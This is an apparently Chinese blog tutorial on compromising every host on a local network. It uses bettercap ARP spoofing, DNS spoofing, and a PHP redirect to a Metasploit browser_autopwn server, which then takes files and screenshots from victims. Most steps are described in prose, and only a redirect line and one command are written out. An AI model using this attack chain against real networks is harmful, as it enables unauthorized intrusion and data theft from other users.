手把手教你如何黑掉整个内网

日出东方，唯我不败；千秋万代，一统江湖！

教主文成武德、泽被苍生 ，千秋万载，一统江湖!

测试主机：kali 2016.2

工具：bettercap、metasploit、dnsspoof、armitage

前期准备工作

在kali下并没有集成bettercap，所以我们需要自己安装

安装完成

启动postgresql服务

metasploit数据库初始化

查看数据库链接状态，如果这里显示数据库未连接可以参考：传送门 连接数据库

启动armitage（关于armitage）

准备一个hosts文件（用于DNS欺骗）

更改：刚才试了一下，在hosts文件中加上端口号好像会出现一些意料不到的问题。这里我们换个思路，直接到ip地址不加端口号，然后开启apache服务，然后将下面的代码保存为index.php放在根目录下（/var/www/html/）

<?php header("Location:http://10.167.33.1:8080"); ?>

这样在DNS欺骗后会跳到指定ip，然后在通过php重定向到我们的payload。

还有一种方法是在下边启动浏览器自动攻击插件时，将端口号直接改成80端口。
/**************************************zhun bei wan cheng *****************************************/
启动浏览器自动攻击模块：browser_autopwn

等待他将所有payload加载完成

arp攻击（执行：bettercap -X）

DNS欺骗（忘了截图 图是后补的 所以参数有点不一样）

现在我们就等鱼上钩，现在同一网关下的主机不管打开什么URL都会解析到我们的URL中，当他打开我们的URL时，程序会自动验证哪个pay可用

查看文件

屏幕截图

当然功能远远不止这些，更多好玩的可以自己探索。

水平有限，有错误请指出。
如果有一块学习的同志私聊我上车。

上车的有点多，要超载了，关注公众号吧，公众号更新会比知乎的更全面

公众号：sssie95zz